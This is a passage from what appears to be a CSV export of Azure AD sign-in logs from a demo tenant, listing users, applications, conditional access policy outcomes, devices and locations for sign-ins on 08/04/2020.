'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 17:48,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",706e1892-a48a-4a34-be7e-87776bd91500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,706e1892-a48a-4a34-be7e-87776bd91500,SigninLogs,Sucess,33.7984581,-84.38828278
+1125,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,10:22.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f5eefa6e-81f8-41ed-9752-d2007ef10478,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:10,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",65ce963c-c870-4311-8389-19e547d50c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,65ce963c-c870-4311-8389-19e547d50c00,SigninLogs,Sucess,41.90428925,-85.99833679
+1126,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,11:32.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,76f314a3-2f28-4e18-8a6c-274880a9bcef,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:11,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",f81997e3-0b26-42cc-8532-c4ded9560e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,f81997e3-0b26-42cc-8532-c4ded9560e00,SigninLogs,Sucess,41.90428925,-85.99833679
+1127,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,12:39.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2f497c11-ffb2-4e73-b51d-4173f46a4e27,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,ACOM Azure Website,23523755-3a2b-41ca-9315-f81f3f566a95,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:12,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",22fd8c7c-75eb-4549-80fa-1727f78d0d00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,22fd8c7c-75eb-4549-80fa-1727f78d0d00,SigninLogs,Sucess,50.6406517,5.572050095
+1128,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,12:43.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,6d87281e-de98-4413-aeba-55e09212b0b1,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:12,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",fbcf3a57-b92a-4bcf-a38d-09fba8e30d00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,fbcf3a57-b92a-4bcf-a38d-09fba8e30d00,SigninLogs,Sucess,41.90428925,-85.99833679
+1129,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,11:31.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,82ad5bdb-8911-4df0-8861-27ac3d0f30b0,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:11,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",e9cfabe1-d666-446f-aeb7-5817453e0e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,e9cfabe1-d666-446f-aeb7-5817453e0e00,SigninLogs,Sucess,41.90428925,-85.99833679
+1130,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,12:39.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,be614956-e5f4-402d-b08d-2af1bd5ce978,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:12,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",e9cfabe1-d666-446f-aeb7-581742480e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,e9cfabe1-d666-446f-aeb7-581742480e00,SigninLogs,Sucess,41.90428925,-85.99833679
+1131,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,12:29.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,88c1469f-c04f-0000-5d4f-bf678084fbc6,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:12,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",f81997e3-0b26-42cc-8532-c4dedf5e0e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,f81997e3-0b26-42cc-8532-c4dedf5e0e00,SigninLogs,Sucess,41.90428925,-85.99833679
+1132,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,08:06.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,7d763fec-8d4c-4b0c-b8a8-8de82e223bd9,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 